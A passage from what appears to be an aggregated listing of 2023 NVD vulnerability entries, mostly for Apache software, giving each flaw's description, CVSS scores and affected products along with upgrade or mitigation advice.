All versions of Apache Santuario - XML Security for Java prior to 2.2.6, 2.3.4, and 3.0.3, when using the JSR 105 API, are vulnerable to an issue where a private key may be disclosed in log files when generating an XML Signature and logging at debug level is enabled. Users are recommended to upgrade to version 2.2.6, 2.3.4, or 3.0.3, which fix this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache santuario_xml_security_for_java *
CVE-2023-44487

The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
microsoft windows_10_1809 *
f5 big-ip_application_security_manager *
redhat jboss_enterprise_application_platform 6.0.0
microsoft windows_server_2022 -
cisco prime_cable_provisioning *
redhat cost_management -
cisco nx-os *
microsoft asp.net_core *
f5 big-ip_advanced_web_application_firewall 17.1.0
cisco iot_field_network_director *
redhat openshift_container_platform 4.0
linkerd linkerd 2.13.0
linecorp armeria *
linkerd linkerd 2.14.0
f5 big-ip_link_controller *
f5 big-ip_domain_name_system 17.1.0
redhat jboss_fuse 6.0.0
ietf http 2.0
f5 big-ip_ssl_orchestrator *
microsoft windows_server_2016 -
cisco ios_xe *
f5 big-ip_advanced_web_application_firewall *
f5 big-ip_fraud_protection_service *
apache tomcat *
netapp oncommand_insight -
redhat jboss_data_grid 7.0.0
f5 nginx_plus r30
projectcontour contour *
netty netty *
microsoft cbl-mariner *
openresty openresty *
redhat advanced_cluster_management_for_kubernetes 2.0
traefik traefik 3.0.0
cisco crosswork_situation_manager -
varnish_cache_project varnish_cache *
redhat openshift_developer_tools_and_services -
redhat node_healthcheck_operator -
redhat self_node_remediation_operator -
redhat ceph_storage 5.0
redhat openshift_api_for_data_protection -
microsoft windows_11_21h2 *
redhat logging_subsystem_for_red_hat_openshift -
redhat openshift_virtualization 4
f5 big-ip_global_traffic_manager 17.1.0
facebook proxygen *
redhat integration_camel_for_spring_boot -
konghq kong_gateway *
redhat openshift_serverless -
f5 big-ip_carrier-grade_nat *
redhat machine_deletion_remediation_operator -
redhat cryostat 2.0
cisco ultra_cloud_core_-_policy_control_function 2024.01.0
f5 big-ip_ddos_hybrid_defender 17.1.0
redhat migration_toolkit_for_containers -
redhat openstack_platform 16.1
cisco prime_network_registrar *
grpc grpc 1.57.0
fedoraproject fedora 37
nodejs node.js *
f5 big-ip_global_traffic_manager *
microsoft azure_kubernetes_service *
microsoft windows_server_2019 -
redhat node_maintenance_operator -
kazu-yamamoto http2 *
nghttp2 nghttp2 *
cisco crosswork_data_gateway *
redhat openshift_secondary_scheduler_operator -
microsoft .net *
redhat jboss_fuse 7.0.0
redhat fence_agents_remediation_operator -
f5 big-ip_fraud_protection_service 17.1.0
apple swiftnio_http/2 *
jenkins jenkins *
debian debian_linux 10.0
f5 big-ip_application_acceleration_manager *
f5 big-ip_advanced_firewall_manager 17.1.0
redhat certification_for_red_hat_enterprise_linux 8.0
f5 big-ip_local_traffic_manager 17.1.0
f5 big-ip_link_controller 17.1.0
apache apisix *
fedoraproject fedora 38
redhat openstack_platform 17.1
f5 big-ip_analytics *
linkerd linkerd 2.14.1
cisco ios_xr *
redhat cert-manager_operator_for_red_hat_openshift -
redhat service_telemetry_framework 1.5
f5 big-ip_policy_enforcement_manager 17.1.0
f5 big-ip_websafe 17.1.0
f5 big-ip_analytics 17.1.0
f5 big-ip_application_acceleration_manager 17.1.0
redhat satellite 6.0
cisco data_center_network_manager -
cisco unified_contact_center_domain_manager -
redhat quay 3.0.0
f5 big-ip_access_policy_manager 17.1.0
cisco ultra_cloud_core_-_session_management_function *
redhat 3scale_api_management_platform 2.0
cisco unified_attendant_console_advanced -
f5 big-ip_application_visibility_and_reporting 17.1.0
linkerd linkerd 2.13.1
redhat enterprise_linux 6.0
envoyproxy envoy 1.26.4
envoyproxy envoy 1.25.9
cisco secure_dynamic_attributes_connector *
redhat certification_for_red_hat_enterprise_linux 9.0
f5 big-ip_local_traffic_manager *
redhat openshift_gitops -
microsoft windows_10_22h2 *
redhat ansible_automation_platform 2.0
redhat build_of_optaplanner 8.0
redhat enterprise_linux 8.0
redhat integration_camel_k -
redhat advanced_cluster_security 4.0
cisco prime_access_registrar *
redhat decision_manager 7.0
linkerd linkerd *
cisco prime_infrastructure *
f5 big-ip_access_policy_manager *
cisco secure_web_appliance_firmware *
redhat web_terminal -
microsoft windows_10_1607 *
redhat jboss_a-mq 7
cisco unified_contact_center_enterprise -
envoyproxy envoy 1.27.0
redhat openshift_container_platform_assisted_installer -
redhat openshift -
apache solr *
eclipse jetty *
f5 big-ip_webaccelerator 17.1.0
cisco crosswork_zero_touch_provisioning *
traefik traefik *
f5 big-ip_webaccelerator *
redhat jboss_core_services -
apache tomcat 11.0.0
cisco connected_mobile_experiences *
microsoft visual_studio_2022 *
debian debian_linux 11.0
netapp astra_control_center -
f5 big-ip_policy_enforcement_manager *
f5 big-ip_domain_name_system *
cisco telepresence_video_communication_server *
f5 big-ip_carrier-grade_nat 17.1.0
redhat openshift_pipelines -
redhat process_automation 7.0
f5 nginx_plus *
debian debian_linux 12.0
redhat openshift_service_mesh 2.0
cisco ultra_cloud_core_-_policy_control_function *
cisco unified_contact_center_management_portal -
cisco secure_malware_analytics *
golang http2 *
apache traffic_server *
redhat openshift_distributed_tracing -
redhat build_of_quarkus -
redhat integration_service_registry -
microsoft windows_11_22h2 *
f5 nginx *
golang go *
golang networking *
cisco business_process_automation *
cisco unified_contact_center_enterprise_-_live_data_server *
akka http_server *
redhat openshift_sandboxed_containers -
f5 big-ip_application_visibility_and_reporting *
caddyserver caddy *
f5 big-ip_next_service_proxy_for_kubernetes *
f5 nginx_plus r29
envoyproxy envoy 1.24.10
amazon opensearch_data_prepper *
cisco fog_director *
f5 big-ip_websafe *
redhat migration_toolkit_for_virtualization -
redhat support_for_spring_boot -
cisco enterprise_chat_and_email -
f5 big-ip_advanced_firewall_manager *
f5 big-ip_next 20.0.1
microsoft windows_10_21h2 *
f5 big-ip_application_security_manager 17.1.0
redhat migration_toolkit_for_applications 6.0
redhat advanced_cluster_security 3.0
f5 big-ip_ddos_hybrid_defender *
istio istio *
cisco firepower_threat_defense *
redhat openshift_dev_spaces -
cisco crosswork_data_gateway 5.0
cisco expressway *
redhat single_sign-on 7.0
redhat network_observability_operator -
redhat service_interconnect 1.0
grpc grpc *
redhat run_once_duration_override_operator -
dena h2o *
redhat jboss_a-mq_streams -
redhat jboss_enterprise_application_platform 7.0.0
redhat enterprise_linux 9.0
redhat openstack_platform 16.2
f5 big-ip_ssl_orchestrator 17.1.0
cisco ultra_cloud_core_-_serving_gateway_function *
f5 nginx_ingress_controller *
redhat openshift_data_science -
CVE-2023-44981

Authorization Bypass Through User-Controlled Key vulnerability in Apache ZooKeeper. If SASL Quorum Peer authentication is enabled in ZooKeeper (quorum.auth.enableSasl=true), the authorization is done by verifying that the instance part in the SASL authentication ID is listed in the zoo.cfg server list. The instance part in the SASL auth ID is optional and if it's missing, like 'eve@EXAMPLE.COM', the authorization check will be skipped. As a result an arbitrary endpoint could join the cluster and begin propagating counterfeit changes to the leader, essentially giving it complete read-write access to the data tree. Quorum Peer authentication is not enabled by default. Users are recommended to upgrade to version 3.9.1, 3.8.3 or 3.7.2, which fix the issue. Alternatively, ensure the ensemble election/quorum communication is protected by a firewall, as this will mitigate the issue. See the documentation for more details on correct cluster administration.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N 3.9 5.2

Products Affected

Vendor Product Version
apache zookeeper *
debian debian_linux 10.0
debian debian_linux 12.0
debian debian_linux 11.0
apache zookeeper 3.9.0
CVE-2023-45348

Apache Airflow, versions 2.7.0 and 2.7.1, is affected by a vulnerability that allows an authenticated user to retrieve sensitive configuration information when the "expose_config" option is set to "non-sensitive-only". The `expose_config` option is False by default. It is recommended to upgrade to a version that is not affected.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4

Products Affected

Vendor Product Version
apache airflow *
CVE-2023-45648

Improper Input Validation vulnerability in Apache Tomcat. Tomcat from 11.0.0-M1 through 11.0.0-M11, from 10.1.0-M1 through 10.1.13, from 9.0.0-M1 through 9.0.81 and from 8.5.0 through 8.5.93 did not correctly parse HTTP trailer headers. A specially crafted, invalid trailer header could cause Tomcat to treat a single request as multiple requests, leading to the possibility of request smuggling when behind a reverse proxy. Older, EOL versions may also be affected. Users are recommended to upgrade to version 11.0.0-M12 onwards, 10.1.14 onwards, 9.0.81 onwards or 8.5.94 onwards, which fix the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N 3.9 1.4

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 10.1.0
apache tomcat 11.0.0
apache tomcat 9.0.0
debian debian_linux 10.0
debian debian_linux 12.0
debian debian_linux 11.0
CVE-2023-45725

Design document functions which receive a user HTTP request object may expose authorization or session cookie headers of the user who accesses the document. These design document functions are: list, show, rewrite and update. An attacker can leak the session component using an HTML-like output, insert the session as an external resource (such as an image), or store the credential in a _local document with an "update" function. For the attack to succeed the attacker has to be able to insert the design documents into the database, then manipulate a user to access a function from that design document. Workaround: Avoid using design documents from untrusted sources which may attempt to access or manipulate the request object's headers.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.7 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N 2.1 3.6

Products Affected

Vendor Product Version
apache couchdb *
CVE-2023-45757

Security vulnerability in Apache bRPC <=1.6.0 on all platforms allows attackers to inject XSS code into the builtin rpcz page. An attacker that can send HTTP requests to a bRPC server with rpcz enabled can inject arbitrary XSS code into the builtin rpcz page. Solution (choose one of three):
1. Upgrade to bRPC > 1.6.0, download link: https://dist.apache.org/repos/dist/release/brpc/1.6.1/
2. If you are using an old version of bRPC and it is hard to upgrade, you can apply this patch: https://github.com/apache/brpc/pull/2411
3. Disable the rpcz feature.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

Products Affected

Vendor Product Version
apache brpc *
CVE-2023-45802

When an HTTP/2 stream was reset (RST frame) by a client, there was a time window where the request's memory resources were not reclaimed immediately. Instead, de-allocation was deferred to connection close. A client could send new requests and resets, keeping the connection busy and open and causing the memory footprint to keep on growing. On connection close, all resources were reclaimed, but the process might run out of memory before that. This was found by the reporter during testing of CVE-2023-44487 (HTTP/2 Rapid Reset Exploit) with their own test client. During "normal" HTTP/2 use, the probability of hitting this bug is very low. The kept memory would not become noticeable before the connection closes or times out. Users are recommended to upgrade to version 2.4.58, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H 2.2 3.6

Products Affected

Vendor Product Version
apache http_server *
fedoraproject fedora 37
fedoraproject fedora 38
debian debian_linux 10.0
fedoraproject fedora 39
CVE-2023-46104

Uncontrolled resource consumption can be triggered by an authenticated attacker that uploads a malicious ZIP to import a database, dashboards or datasets. This vulnerability exists in Apache Superset versions up to and including 2.1.2 and versions 3.0.0, 3.0.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H 2.8 3.6
security@apache.org 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H 2.8 3.6

Products Affected

Vendor Product Version
apache superset *
CVE-2023-46215

Insertion of Sensitive Information into Log File vulnerability in Apache Airflow Celery provider, Apache Airflow. Sensitive information is logged as clear text when the rediss, amqp or rpc protocols are used as the Celery result backend. Note: the vulnerability is about the information exposed in the logs, not about accessing the logs. This issue affects Apache Airflow Celery provider: from 3.3.0 through 3.4.0; Apache Airflow: from 1.10.0 through 2.6.3. Users are recommended to upgrade the Airflow Celery provider to version 3.4.1 and Apache Airflow to version 2.7.0, which fix the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache airflow *
apache airflow_celery_provider *
CVE-2023-46226

Remote Code Execution vulnerability in Apache IoTDB. This issue affects Apache IoTDB: from 1.0.0 through 1.2.2. Users are recommended to upgrade to version 1.3.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache iotdb *
CVE-2023-46227

Deserialization of Untrusted Data vulnerability in Apache Software Foundation Apache InLong. This issue affects Apache InLong from 1.4.0 through 1.8.0: the attacker can use \t to bypass. Users are advised to upgrade to Apache InLong 1.9.0 or cherry-pick [1] to solve it. [1] https://github.com/apache/inlong/pull/8814

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache inlong *
CVE-2023-46279

Deserialization of Untrusted Data vulnerability in Apache Dubbo. This issue only affects Apache Dubbo 3.1.5. Users are recommended to upgrade to the latest version, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache dubbo 3.1.5
CVE-2023-46288

Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Airflow. This issue affects Apache Airflow from 2.4.0 to 2.7.0. Sensitive configuration information has been exposed to authenticated users with the ability to read configuration via the Airflow REST API for configuration, even when the expose_config option is set to non-sensitive-only. The expose_config option is False by default. It is recommended to upgrade to a version that is not affected if you set expose_config to non-sensitive-only configuration. This is a different error than CVE-2023-45348, which allows an authenticated user to retrieve individual configuration values in 2.7.* by specially crafting their request (solved in 2.7.2). Users are recommended to upgrade to version 2.7.2, which fixes the issue and additionally fixes CVE-2023-45348.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4

Products Affected

Vendor Product Version
apache airflow *
CVE-2023-46302

Apache Software Foundation Apache Submarine has a bug when serializing against YAML. The bug is caused by snakeyaml (https://nvd.nist.gov/vuln/detail/CVE-2022-1471). Apache Submarine uses JAX-RS to define REST endpoints. In order to handle YAML requests (using the application/yaml content-type), it defines a YamlEntityProvider entity provider that will process all incoming YAML requests. In order to unmarshal the request, the readFrom method is invoked, passing the entityStream containing the user-supplied data in `submarine-server/server-core/src/main/java/org/apache/submarine/server/utils/YamlUtils.java`. We have now fixed this issue in the new version by switching to `jackson-dataformat-yaml`. This issue affects Apache Submarine: from 0.7.0 before 0.8.0. Users are recommended to upgrade to version 0.8.0, which fixes this issue. If you are using a version older than 0.8.0 and do not want to upgrade, you can try cherry-picking PR https://github.com/apache/submarine/pull/1054 and rebuilding the submarine-server image to fix this.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache submarine *
CVE-2023-46589

Improper Input Validation vulnerability in Apache Tomcat. Tomcat from 11.0.0-M1 through 11.0.0-M10, from 10.1.0-M1 through 10.1.15, from 9.0.0-M1 through 9.0.82 and from 8.5.0 through 8.5.95 did not correctly parse HTTP trailer headers. A trailer header that exceeded the header size limit could cause Tomcat to treat a single request as multiple requests, leading to the possibility of request smuggling when behind a reverse proxy. Older, EOL versions may also be affected. Users are recommended to upgrade to version 11.0.0-M11 onwards, 10.1.16 onwards, 9.0.83 onwards or 8.5.96 onwards, which fix the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 11.0.0
CVE-2023-46604

The Java OpenWire protocol marshaller is vulnerable to Remote Code Execution. This vulnerability may allow a remote attacker with network access to either a Java-based OpenWire broker or client to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause either the client or the broker (respectively) to instantiate any class on the classpath. Users are recommended to upgrade both brokers and clients to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3, which fix this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9
security@apache.org 10.0 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H 3.9 6.0

Products Affected

Vendor Product Version
netapp santricity_storage_plugin -
apache activemq *
apache activemq_legacy_openwire_module *
netapp e-series_santricity_web_services_proxy -
debian debian_linux 10.0
netapp e-series_santricity_unified_manager -
debian debian_linux 11.0
CVE-2023-46749

Apache Shiro before 1.13.0 or 2.0.0-alpha-4 may be susceptible to a path traversal attack that results in an authentication bypass when used together with path rewriting. Mitigation: Update to Apache Shiro 1.13.0+ or 2.0.0-alpha-4+, or ensure `blockSemicolon` is enabled (this is the default).

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache shiro 2.0.0
apache shiro *
CVE-2023-46750

URL Redirection to Untrusted Site ('Open Redirect') vulnerability when "form" authentication is used in Apache Shiro. Mitigation: Update to Apache Shiro 1.13.0+ or 2.0.0-alpha-4+.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

Products Affected

Vendor Product Version
apache shiro 2.0.0
apache shiro *
CVE-2023-46801

In Apache Linkis <= 1.5.0, the data source management module has a remote code execution vulnerability when adding a MySQL data source, for Java versions < 1.8.0_241. The deserialization vulnerability, exploited through JRMP, can inject malicious files into the server and execute them. This attack requires the attacker to obtain an authorized account from Linkis before it can be carried out. We recommend that users upgrade the Java version to >= 1.8.0_241, or upgrade Linkis to version 1.6.0.

Products Affected

Vendor Product Version
apache linkis *
CVE-2023-46819

Missing Authentication in Apache Software Foundation Apache OFBiz when using the Solr plugin. This issue affects Apache OFBiz: before 18.12.09. Users are recommended to upgrade to version 18.12.09.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N 3.9 1.4

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2023-46851

Allura Discussion and Allura Forum importing does not restrict URL values specified in attachments. Project administrators can run these imports, which could cause Allura to read local files and expose them. Exposing internal files can then lead to other exploits, like session hijacking or remote code execution. This issue affects Apache Allura from 1.0.1 through 1.15.0. Users are recommended to upgrade to version 1.16.0, which fixes the issue. If you are unable to upgrade, set "disable_entry_points.allura.importers = forge-tracker, forge-discussion" in your .ini config file.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.9 MEDIUM CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N 1.2 3.6

Products Affected

Vendor Product Version
apache allura *
CVE-2023-47037

We failed to apply the fix for CVE-2023-40611 in 2.7.1, and this vulnerability was marked as fixed then. Apache Airflow, versions before 2.7.3, is affected by a vulnerability that allows authenticated and DAG-view authorized users to modify some DAG run detail values when submitting notes. This could allow them to alter details such as configuration parameters, start date, etc. Users should upgrade to version 2.7.3 or later, which has removed the vulnerability.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N 2.8 1.4

Products Affected

Vendor Product Version
apache airflow *
CVE-2023-47248

Deserialization of untrusted data in IPC and Parquet readers in PyArrow versions 0.14.0 to 14.0.0 allows arbitrary code execution. An application is vulnerable if it reads Arrow IPC, Feather or Parquet data from untrusted sources (for example user-supplied input files). This vulnerability only affects PyArrow, not other Apache Arrow implementations or bindings. It is recommended that users of PyArrow upgrade to 14.0.1. Similarly, it is recommended that downstream libraries upgrade their dependency requirements to PyArrow 14.0.1 or later. PyPI packages are already available, and we hope that conda-forge packages will be available soon. If it is not possible to upgrade, we provide a separate package `pyarrow-hotfix` that disables the vulnerability on older PyArrow versions. See https://pypi.org/project/pyarrow-hotfix/ for instructions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache pyarrow *
CVE-2023-47265

Apache Airflow, versions 2.6.0 through 2.7.3, has a stored XSS vulnerability that allows a DAG author to add unbounded and unsanitized JavaScript in the parameter description field of the DAG. This JavaScript can be executed on the client side of any user who looks at the tasks, within the browser sandbox. While this issue does not allow escaping the browser sandbox or manipulating server-side data beyond what the DAG author already can, it allows modifying what the user looking at the DAG details sees in the browser, which opens up all kinds of possibilities for misleading other users. Users of Apache Airflow are recommended to upgrade to version 2.8.0 or newer to mitigate the risk associated with this vulnerability.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N 2.3 2.7

Products Affected

Vendor Product Version
apache airflow *
CVE-2023-47804

Apache OpenOffice documents can contain links that call internal macros with arbitrary arguments. Several URI Schemes are defined for this purpose. Links can be activated by clicks, or by automatic document events. The execution of such links must be subject to user approval. In the affected versions of OpenOffice, approval for certain links is not requested; when activated, such links could therefore result in arbitrary script execution. This is a corner case of CVE-2022-47502.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache openoffice *
CVE-2023-48291

Apache Airflow, in versions prior to 2.8.0, contains a security vulnerability that allows an authenticated user with limited access to some DAGs to craft a request that could give the user write access to various DAG resources for DAGs that the user had no access to, thus enabling the user to clear DAGs they shouldn't. This is a missing fix for CVE-2023-42792 in Apache Airflow 2.7.2. Users of Apache Airflow are strongly advised to upgrade to version 2.8.0 or newer to mitigate the risk associated with this vulnerability.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N 2.8 1.4

Products Affected

Vendor Product Version
apache airflow *
CVE-2023-48362

XXE in the XML Format Plugin in Apache Drill version 1.19.0 and greater allows a user to read any file on a remote file system or execute commands via a malicious XML file. Users are recommended to upgrade to version 1.21.2, which fixes this issue.

Products Affected

Vendor Product Version
apache drill *
CVE-2023-48396

Web Authentication vulnerability in Apache SeaTunnel. Since the JWT key is hardcoded in the application, an attacker can forge any token to log in as any user. An attacker can get the secret key from /seatunnel-server/seatunnel-app/src/main/resources/application.yml and then create a token. This issue affects Apache SeaTunnel: 1.0.0. Users are recommended to upgrade to version 1.0.1, which fixes the issue.

Products Affected

Vendor Product Version
apache seatunnel 1.0.0
CVE-2023-48795

The SSH transport protocol with certain OpenSSH extensions, found in OpenSSH before 9.6 and other products, allows remote attackers to bypass integrity checks such that some packets are omitted (from the extension negotiation message), and a client and server may consequently end up with a connection for which some security features have been downgraded or disabled, aka a Terrapin attack. This occurs because the SSH Binary Packet Protocol (BPP), implemented by these extensions, mishandles the handshake phase and mishandles use of sequence numbers. For example, there is an effective attack against SSH's use of ChaCha20-Poly1305 (and CBC with Encrypt-then-MAC). The bypass occurs in chacha20-poly1305@openssh.com and (if CBC is used) the -etm@openssh.com MAC algorithms. This also affects Maverick Synergy Java SSH API before 3.1.0-SNAPSHOT, Dropbear through 2022.83, Ssh before 5.1.1 in Erlang/OTP, PuTTY before 0.80, AsyncSSH before 2.14.2, golang.org/x/crypto before 0.17.0, libssh before 0.10.6, libssh2 through 1.11.0, Thorn Tech SFTP Gateway before 3.4.6, Tera Term before 5.1, Paramiko before 3.4.0, jsch before 0.2.15, SFTPGo before 2.5.6, Netgate pfSense Plus through 23.09.1, Netgate pfSense CE through 2.7.2, HPN-SSH through 18.2.0, ProFTPD before 1.3.8b (and before 1.3.9rc2), ORYX CycloneSSH before 2.3.4, NetSarang XShell 7 before Build 0144, CrushFTP before 10.6.0, ConnectBot SSH library before 2.2.22, Apache MINA sshd through 2.11.0, sshj through 0.37.0, TinySSH through 20230101, trilead-ssh2 6401, LANCOM LCOS and LANconfig, FileZilla before 3.66.4, Nova before 11.8, PKIX-SSH before 14.4, SecureCRT before 9.4.3, Transmit5 before 5.10.4, Win32-OpenSSH before 9.5.0.0p1-Beta, WinSCP before 6.2.2, Bitvise SSH Server before 9.32, Bitvise SSH Client before 9.33, KiTTY through 0.76.1.13, the net-ssh gem 7.2.0 for Ruby, the mscdex ssh2 module before 1.15.0 for Node.js, the thrussh library before 0.35.1 for Rust, and the Russh crate before 0.40.2 for Rust.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N 2.2 3.6

Products Affected

Vendor Product Version
libssh libssh *
matez jsch *
lancom-systems lanconfig -
redhat openshift_serverless -
thorntech sftp_gateway_firmware *
apache sshj *
russh_project russh *
openbsd openssh *
panic transmit_5 *
redhat openshift_container_platform 4.0
redhat openshift_gitops -
lancom-systems lcos_lx -
vandyke securecrt *
redhat openstack_platform 16.1
microsoft powershell *
filezilla-project filezilla_client *
lancom-systems lcos_sx 4.20
lancom-systems lcos_sx 5.20
redhat keycloak -
netsarang xshell_7 *
redhat enterprise_linux 8.0
redhat advanced_cluster_security 4.0
erlang erlang/otp *
lancom-systems lcos *
paramiko paramiko *
oryx-embedded cyclone_ssh *
bitvise ssh_client *
redhat discovery -
proftpd proftpd *
asyncssh_project asyncssh *
tinyssh tinyssh *
dropbear_ssh_project dropbear_ssh *
redhat jboss_enterprise_application_platform 7.0
apple macos *
lancom-systems lcos_fx -
golang crypto *
debian debian_linux 10.0
fedoraproject fedora 39
apache sshd *
gentoo security -
crates thrussh *
fedoraproject fedora 38
redhat advanced_cluster_security 3.0
jadaptive maverick_synergy_java_ssh_api *
net-ssh net-ssh 7.2.0
freebsd freebsd *
roumenpetrov pkixssh *
ssh2_project ssh2 *
redhat openstack_platform 17.1
netgate pfsense_ce *
kitty_project kitty *
trilead ssh2 6401
redhat storage 3.0
netgate pfsense_plus *
panic nova *
redhat cert-manager_operator_for_red_hat_openshift -
redhat openshift_dev_spaces -
putty putty *
redhat single_sign-on 7.0
redhat openshift_data_foundation 4.0
tera_term_project tera_term *
redhat openshift_developer_tools_and_services -
ssh ssh *
connectbot sshlib *
redhat enterprise_linux 9.0
redhat openstack_platform 16.2
redhat openshift_api_for_data_protection -
winscp winscp *
redhat openshift_pipelines -
redhat openshift_virtualization 4
redhat ceph_storage 6.0
crushftp crushftp *
bitvise ssh_server *
libssh2 libssh2 *
sftpgo_project sftpgo *
CVE-2023-48796

Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache DolphinScheduler. The information exposed to unauthorized actors may include sensitive data such as database credentials. Users who can't upgrade to the fixed version can also set the environment variable `MANAGEMENT_ENDPOINTS_WEB_EXPOSURE_INCLUDE=health,metrics,prometheus` to work around this, or add the following section to the `application.yaml` file:

```yaml
management:
  endpoints:
    web:
      exposure:
        include: health,metrics,prometheus
```

This issue affects Apache DolphinScheduler: from 3.0.0 before 3.0.2. Users are recommended to upgrade to version 3.0.2, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache dolphinscheduler *
CVE-2023-49068

